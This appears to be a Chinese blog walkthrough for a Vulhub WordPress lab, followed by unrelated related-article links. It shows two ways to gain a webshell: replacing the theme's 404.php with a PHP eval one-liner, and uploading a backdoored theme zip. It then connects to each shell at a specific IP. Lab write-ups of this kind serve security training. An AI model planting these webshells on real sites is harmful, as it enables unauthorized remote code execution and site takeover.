当前位置: 首页 > news >正文

Vulhub-wordpress通关攻略

news 2025/7/7 18:50:32

        姿势一、后台修改模板拿WebShell

        第一步:进⼊Vulhub靶场并执⾏以下命令开启靶场;在浏览器中访问并安装好....

        第二步:找到外观--编辑--404.php,将原内容删除并修改为一句话木马,点击更新--File edited successfully.

<?php eval($_POST[cmd]);?>
        第三步:找到404.php的路径,使用蚁剑进行连接

#URL地址
http://47.103.81.25:8080/wp-content/themes/twentyfifteen/404.php

        姿势二、上传主题拿WebShell

        第一步:找到外观--主题--添加--上传主题--浏览---现在安装

        第二步:在网站上搜索WordPress主题免费下载,将后门文件shell.php加入后压缩为webshell.zip文件,上传

        第三步:使用蚁剑进行连接

http://47.103.81.25:8080/wp-content/themes/webshell/shell.php

                                                                                                                                FROM  IYU_

http://www.dtcms.com/a/79504.html

相关文章:

  • 【LangChain入门 6 Chain组件】单链和多链
  • 微信小程序的业务域名配置(通过ingress网关的注解)
  • Java 中处理邮件附件:本地文件 vs 在线 URL
  • 产业观察:ASML2025.3.21
  • Git(12)GitLab持续集成(CICD)
  • 用ArcGIS做一张符合环评要求的植被类型图
  • [过程记录] 《分寝室》 一题做法思考
  • 基于springboot的教务系统(源码+lw+部署文档+讲解),源码可白嫖!
  • 《模型思维》第二十三章 “与集体行动有关的问题” 总结
  • LLM之向量数据库Chroma milvus FAISS
  • AI+视频赋能智慧农业:EasyCVR打造全域可视化农场监管平台
  • AI日报 - 2025年3月20日
  • 《Java核心三问:字符串、equals()、hashCode()的隐藏雷区与完美避坑手册》
  • UltraSearch一键直达文件,高效搜索新体验
  • 双指针算法-day14(分组循环)
  • java数据结构之双端对列
  • 力扣刷题——25.K个一组翻转链表
  • 【全国产化主板】解决方案探讨:CPU、FPGA、GPU、AI的融合与优化
  • 【最后203篇系列】020 rocksdb agent
  • 《视觉SLAM十四讲》ch13 设计SLAM系统 相机轨迹实现
  • Neo4j GDS-04-图的中心性分析介绍
  • 力扣977. 有序数组的平方(双指针技巧)
  • 【STM32】I²CC通信外设硬件I²CC读写MPU6050(学习笔记)
  • kubernetes高级实战
  • 6.3考研408数据结构中BFS与DFS的易错点及难点解析
  • 9、Python collections模块高效数据结构
  • 前端面试常考基础题目详解
  • 3月20号
  • 通过调整相邻分区实现Linux根分区扩容(ext4文件系统)
  • vue里localStorage可以直接用吗